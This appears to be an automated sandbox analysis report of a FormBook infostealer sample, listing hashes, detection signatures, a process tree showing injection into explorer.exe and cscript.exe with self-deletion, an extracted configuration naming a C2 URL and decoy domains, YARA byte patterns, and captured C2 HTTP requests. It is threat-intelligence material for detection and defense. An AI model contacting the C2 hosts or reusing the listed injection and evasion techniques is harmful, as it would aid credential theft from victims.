Windows Analysis Report New_1007572_021.exe

Overview

General Information

Sample Name: New_1007572_021.exe
Analysis ID: 458848
MD5: 41137fd61b9cc0d92225c91660a5902c
SHA1: 15d023fd6d344cb18243469a3ee01fea6bb189af
SHA256: b04306fa8223c20a1abaaa6aeb5cabb2a83dc04337beb2acfd47784b34b682bc
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New_1007572_021.exe (PID: 6688 cmdline: 'C:\Users\user\Desktop\New_1007572_021.exe' MD5: 41137FD61B9CC0D92225C91660A5902C)
    • New_1007572_021.exe (PID: 6280 cmdline: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • FB_5908.tmp.exe (PID: 6340 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
      • FB_5E87.tmp.exe (PID: 6344 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
        • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cscript.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 6872 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0xa11c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa386:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15ea9:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15995:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15fab:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16123:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xad9e:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x14c10:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xba97:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1bd1b:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1cd1e:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18c3d:$sqlite3step: 68 34 1C 7B E1
    • 0x18d50:$sqlite3step: 68 34 1C 7B E1
    • 0x18c6c:$sqlite3text: 68 38 2A 90 C5
    • 0x18d91:$sqlite3text: 68 38 2A 90 C5
    • 0x18c7f:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18da7:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0xa040:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa2aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15dcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x158b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15ecf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16047:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xacc2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x14b34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb9bb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1bc3f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1cc42:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.New_1007572_021.exe.3eb8b30.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.New_1007572_021.exe.3eb8b30.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0xe5c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xe82a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x1a34d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x19e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x1a44f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a5c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xf242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x190b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xff3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x201bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x211c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.New_1007572_021.exe.3eb8b30.6.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x1d0e1:$sqlite3step: 68 34 1C 7B E1
    • 0x1d1f4:$sqlite3step: 68 34 1C 7B E1
    • 0x1d110:$sqlite3text: 68 38 2A 90 C5
    • 0x1d235:$sqlite3text: 68 38 2A 90 C5
    • 0x1d123:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1d24b:$sqlite3blob: 68 53 D8 7F 8C
10.2.FB_5E87.tmp.exe.1080000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
10.2.FB_5E87.tmp.exe.1080000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: New_1007572_021.exe | ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match | File source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: New_1007572_021.exe | Joe Sandbox ML: detected
Source: 0.2.New_1007572_021.exe.2d49d5c.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.New_1007572_021.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: New_1007572_021.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: New_1007572_021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe, 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdb | source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.domoexpra.club/cg53/
Source: global traffic | HTTP traffic detected: GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1 | Host: www.comfsresidential.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: global traffic | HTTP traffic detected: GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1 | Host: www.comfsresidential.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.comfsresidential.com
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000B.00000000.785548112.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.come.comE
Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comiona
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: New_1007572_021.exe, 00000000.00000002.737740321.00000000010B0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
